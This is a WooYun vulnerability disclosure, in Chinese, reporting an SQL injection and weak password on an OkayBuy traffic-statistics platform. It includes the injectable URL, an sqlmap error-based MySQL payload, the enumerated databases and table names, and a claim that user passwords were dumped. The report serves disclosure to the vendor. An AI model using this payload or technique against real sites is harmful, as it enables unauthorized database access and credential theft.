当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-066036

漏洞标题:好乐买某平台Sql注入+弱口令(涉及主站及后台)

相关厂商:好乐买

漏洞作者: 路人甲

提交时间:2014-06-24 13:42

修复时间:2014-08-08 13:44

公开时间:2014-08-08 13:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-06-24: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-08-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

看看你们的站是大厂商 还是小厂商

详细说明:

0x01.注入 http://traffic.okaybuy.com.cn/ip_dst.php?site=1%27

222.png


sqlmap identified the following injection points with a total of 66 HTTP(s) requests:
---
Place: GET
Parameter: site
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: site=1' AND (SELECT 2989 FROM(SELECT COUNT(*),CONCAT(0x7162687771,(SELECT (CASE WHEN (2989=2989) THEN 1 ELSE 0 END)),0x7162677371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'pwoh'='pwoh
---
web application technology: Apache
back-end DBMS: MySQL 5.0
available databases [3]:
[*] information_schema
[*] OkayBuyCount
[*] test


web application technology: Apache
back-end DBMS: MySQL 5.0
Database: OkayBuyCount
[483 tables]
+---------------------------+
| Admin                     |
| Config                    |
| HisData                   |
| IPData                    |
| IPHis                     |
| IPPV                      |
| MediaPic                  |
| Shop                      |
| Shop_utf8                 |
| Traffic                   |
| Traffic_20130926_20131210 |
| 13-01-01                  |
| 13-01-02                  |
| 13-01-03                  |
| 13-01-04                  |
| 13-01-05                  |
| 13-01-06                  |
| 13-01-07                  |
| 13-01-08                  |
| 13-01-09                  |
| 13-01-10                  |
| 13-01-11                  |
| 13-01-12                  |
| 13-01-13                  |
| 13-01-14                  |
| 13-01-15                  |
| 13-01-16                  |
| 13-01-17                  |
| 13-01-18                  |
| 13-01-19                  |
| 13-01-20                  |
| 13-01-21                  |
| 13-01-22                  |
| 13-01-23                  |
| 13-01-24                  |
| 13-01-25                  |
| 13-01-26                  |
| 13-01-27                  |
| 13-01-28                  |
| 13-01-29                  |
| 13-01-30                  |
| 13-01-31                  |
| 13-02-01                  |
| 13-02-02                  |
| 13-02-03                  |
| 13-02-04                  |
| 13-02-05                  |
| 13-02-06                  |
| 13-02-07                  |
| 13-02-08                  |
| 13-02-09                  |
| 13-02-10                  |
| 13-02-11                  |
| 13-02-12                  |
| 13-02-13                  |
| 13-02-14                  |
| 13-02-15                  |
| 13-02-16                  |
| 13-02-17                  |
| 13-02-18                  |
| 13-02-19                  |
| 13-02-20                  |
| 13-02-21                  |
| 13-02-22                  |
| 13-02-23                  |
| 13-02-24                  |
| 13-02-25                  |
| 13-02-26                  |
| 13-02-27                  |
| 13-02-28                  |
| 13-03-01                  |
| 13-03-02                  |
| 13-03-03                  |
| 13-03-04                  |
| 13-03-05                  |
| 13-03-06                  |
| 13-03-07                  |
| 13-03-08                  |
| 13-03-09                  |
| 13-03-10                  |
| 13-03-11                  |
| 13-03-12                  |
| 13-03-13                  |
| 13-03-14                  |
| 13-03-15                  |
| 13-03-16                  |
| 13-03-17                  |
| 13-03-18                  |
| 13-03-19                  |
| 13-03-20                  |
| 13-03-21                  |
| 13-03-22                  |
| 13-03-23                  |
| 13-03-24                  |
| 13-03-25                  |
| 13-03-26                  |
| 13-03-27                  |
| 13-03-28                  |
| 13-03-29                  |
| 13-03-30                  |
| 13-03-31                  |
| 13-04-01                  |
| 13-04-02                  |
| 13-04-03                  |
| 13-04-04                  |
| 13-04-05                  |
| 13-04-06                  |
| 13-04-07                  |
| 13-04-08                  |
| 13-04-09                  |
| 13-04-10                  |
| 13-04-11                  |
| 13-04-12                  |
| 13-04-13                  |
| 13-04-14                  |
| 13-04-15                  |
| 13-04-16                  |
| 13-04-17                  |
| 13-04-18                  |
| 13-04-19                  |
| 13-04-20                  |
| 13-04-21                  |
| 13-04-22                  |
| 13-04-23                  |
| 13-04-24                  |
| 13-04-25                  |
| 13-04-26                  |
| 13-04-27                  |
| 13-04-28                  |
| 13-04-29                  |
| 13-04-30                  |
| 13-05-01                  |
| 13-05-02                  |
| 13-05-03                  |
| 13-05-04                  |
| 13-05-05                  |
| 13-05-06                  |
| 13-05-07                  |
| 13-05-08                  |
| 13-05-09                  |
| 13-05-10                  |
| 13-05-11                  |
| 13-05-12                  |
| 13-05-13                  |
| 13-05-14                  |
| 13-05-15                  |
| 13-05-16                  |
| 13-05-17                  |
| 13-05-18                  |
| 13-05-19                  |
| 13-05-20                  |
| 13-05-21                  |
| 13-05-22                  |
| 13-05-23                  |
| 13-05-24                  |
| 13-05-25                  |
| 13-05-26                  |
| 13-05-27                  |
| 13-05-28                  |
| 13-05-29                  |
| 13-05-30                  |
| 13-05-31                  |
| 13-06-01                  |
| 13-06-02                  |
| 13-06-03                  |
| 13-06-04                  |
| 13-06-05                  |
| 13-06-06                  |
| 13-06-07                  |
| 13-06-08                  |
| 13-06-09                  |
| 13-06-10                  |
| 13-06-11                  |
| 13-06-12                  |
| 13-06-13                  |
| 13-06-14                  |
| 13-06-15                  |
| 13-06-16                  |
| 13-06-17                  |
| 13-06-18                  |
| 13-06-19                  |
| 13-06-20                  |
| 13-06-21                  |
| 13-06-22                  |
| 13-06-23                  |
| 13-06-24                  |
| 13-06-25                  |
| 13-06-26                  |
| 13-06-27                  |
| 13-06-28                  |
| 13-06-29                  |
| 13-06-30                  |
| 13-07-01                  |
| 13-07-02                  |
| 13-07-03                  |
| 13-07-04                  |
| 13-07-05                  |
| 13-07-06                  |
| 13-07-07                  |
| 13-07-08                  |
| 13-07-09                  |
| 13-07-10                  |
| 13-07-11                  |
| 13-07-12                  |
| 13-07-13                  |
| 13-07-14                  |
| 13-07-15                  |
| 13-07-16                  |
| 13-07-17                  |
| 13-07-18                  |
| 13-07-19                  |
| 13-07-20                  |
| 13-07-21                  |
| 13-07-22                  |
| 13-07-23                  |
| 13-07-24                  |
| 13-07-25                  |
| 13-07-26                  |
| 13-07-27                  |
| 13-07-28                  |
| 13-07-29                  |
| 13-07-30                  |
| 13-07-31                  |
| 13-08-01                  |
| 13-08-02                  |
| 13-08-03                  |
| 13-08-04                  |
| 13-08-05                  |
| 13-08-06                  |
| 13-08-07                  |
| 13-08-08                  |
| 13-08-09                  |
| 13-08-10                  |
| 13-08-11                  |
| 13-08-12                  |
| 13-08-13                  |
| 13-08-14                  |
| 13-08-15                  |
| 13-08-16                  |
| 13-08-17                  |
| 13-08-18                  |
| 13-08-19                  |
| 13-08-20                  |
| 13-08-21                  |
| 13-08-22                  |
| 13-08-23                  |
| 13-08-24                  |
| 13-08-25                  |
| 13-08-26                  |
| 13-08-27                  |
| 13-08-28                  |
| 13-08-29                  |
| 13-08-30                  |
| 13-08-31                  |
| 13-09-01                  |
| 13-09-02                  |
| 13-09-03                  |
| 13-09-04                  |
| 13-09-05                  |
| 13-09-06                  |
| 13-09-07                  |
| 13-09-08                  |
| 13-09-09                  |
| 13-09-10                  |
| 13-09-11                  |
| 13-09-12                  |
| 13-09-13                  |
| 13-09-14                  |
| 13-09-15                  |
| 13-09-16                  |
| 13-09-17                  |
| 13-09-18                  |
| 13-09-19                  |
| 13-09-20                  |
| 13-09-21                  |
| 13-09-22                  |
| 13-09-23                  |
| 13-09-24                  |
| 13-09-25                  |
| 13-09-26                  |
| 13-12-10                  |
| 13-12-11                  |
| 13-12-12                  |
| 13-12-13                  |
| 13-12-14                  |
| 13-12-15                  |
| 13-12-16                  |
| 13-12-17                  |
| 13-12-18                  |
| 13-12-19                  |
| 13-12-20                  |
| 13-12-21                  |
| 13-12-22                  |
| 13-12-23                  |
| 13-12-24                  |
| 13-12-25                  |
| 13-12-26                  |
| 13-12-27                  |
| 13-12-28                  |
| 13-12-29                  |
| 13-12-30                  |
| 13-12-31                  |
| 14-01-01                  |
| 14-01-02                  |
| 14-01-03                  |
| 14-01-04                  |
| 14-01-05                  |
| 14-01-06                  |
| 14-01-07                  |
| 14-01-08                  |
| 14-01-09                  |
| 14-01-10                  |
| 14-01-11                  |
| 14-01-12                  |
| 14-01-13                  |
| 14-01-14                  |
| 14-01-15                  |
| 14-01-16                  |
| 14-01-17                  |
| 14-01-18                  |
| 14-01-19                  |
| 14-01-20                  |
| 14-01-21                  |
| 14-01-22                  |
| 14-01-23                  |
| 14-01-24                  |
| 14-01-25                  |
| 14-01-26                  |
| 14-01-27                  |
| 14-01-28                  |
| 14-01-29                  |
| 14-01-30                  |
| 14-01-31                  |
| 14-02-01                  |
| 14-02-02                  |
| 14-02-03                  |
| 14-02-04                  |
| 14-02-05                  |
| 14-02-06                  |
| 14-02-07                  |
| 14-02-08                  |
| 14-02-09                  |
| 14-02-10                  |
| 14-02-11                  |
| 14-02-12                  |
| 14-02-13                  |
| 14-02-14                  |
| 14-02-15                  |
| 14-02-16                  |
| 14-02-17                  |
| 14-02-18                  |
| 14-02-19                  |
| 14-02-20                  |
| 14-02-21                  |
| 14-02-22                  |
| 14-02-23                  |
| 14-02-24                  |
| 14-02-25                  |
| 14-02-26                  |
| 14-02-27                  |
| 14-02-28                  |
| 14-03-01                  |
| 14-03-02                  |
| 14-03-03                  |
| 14-03-04                  |
| 14-03-05                  |
| 14-03-06                  |
| 14-03-07                  |
| 14-03-08                  |
| 14-03-09                  |
| 14-03-10                  |
| 14-03-11                  |
| 14-03-12                  |
| 14-03-13                  |
| 14-03-14                  |
| 14-03-15                  |
| 14-03-16                  |
| 14-03-17                  |
| 14-03-18                  |
| 14-03-19                  |
| 14-03-20                  |
| 14-03-21                  |
| 14-03-22                  |
| 14-03-23                  |
| 14-03-24                  |
| 14-03-25                  |
| 14-03-26                  |
| 14-03-27                  |
| 14-03-28                  |
| 14-03-29                  |
| 14-03-30                  |
| 14-03-31                  |
| 14-04-01                  |
| 14-04-02                  |
| 14-04-03                  |
| 14-04-04                  |
| 14-04-05                  |
| 14-04-06                  |
| 14-04-07                  |
| 14-04-08                  |
| 14-04-09                  |
| 14-04-10                  |
| 14-04-11                  |
| 14-04-12                  |
| 14-04-13                  |
| 14-04-14                  |
| 14-04-15                  |
| 14-04-16                  |
| 14-04-17                  |
| 14-04-18                  |
| 14-04-19                  |
| 14-04-20                  |
| 14-04-21                  |
| 14-04-22                  |
| 14-04-23                  |
| 14-04-24                  |
| 14-04-25                  |
| 14-04-26                  |
| 14-04-27                  |
| 14-04-28                  |
| 14-04-29                  |
| 14-04-30                  |
| 14-05-01                  |
| 14-05-02                  |
| 14-05-03                  |
| 14-05-04                  |
| 14-05-05                  |
| 14-05-06                  |
| 14-05-07                  |
| 14-05-08                  |
| 14-05-09                  |
| 14-05-10                  |
| 14-05-11                  |
| 14-05-12                  |
| 14-05-13                  |
| 14-05-14                  |
| 14-05-15                  |
| 14-05-16                  |
| 14-05-17                  |
| 14-05-18                  |
| 14-05-19                  |
| 14-05-20                  |
| 14-05-21                  |
| 14-05-22                  |
| 14-05-23                  |
| 14-05-24                  |
| 14-05-25                  |
| 14-05-26                  |
| 14-05-27                  |
| 14-05-28                  |
| 14-05-29                  |
| 14-05-30                  |
| 14-05-31                  |
| 14-06-01                  |
| 14-06-02                  |
| 14-06-03                  |
| 14-06-04                  |
| 14-06-05                  |
| 14-06-06                  |
| 14-06-07                  |
| 14-06-08                  |
| 14-06-09                  |
| 14-06-10                  |
| 14-06-11                  |
| 14-06-12                  |
| 14-06-13                  |
| 14-06-14                  |
| 14-06-15                  |
| 14-06-16                  |
| 14-06-17                  |
| 14-06-18                  |
| 14-06-19                  |
| 14-06-20                  |
| 14-06-21                  |
| 14-06-22                  |
| 14-06-23                  |
| day_postion_order         |
| day_postion_tj            |
| shop_close                |
| tb_cliporder              |
| tb_daystat                |
| tb_mideaexp               |
| temptable_nuomicount      |
+---------------------------+


漏洞证明:

asd.png


#我只是把这个统计平台的用户密码跑出来了

修复方案:

你们的库很有个性。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论

  1. 2014-08-08 16:31 | 暗影侠客 ( 路人 | Rank:4 漏洞数:5 | xss,inject,ctrf)

    为什么说会涉及主站与后台?这个是他们的用户轨迹跟踪系统!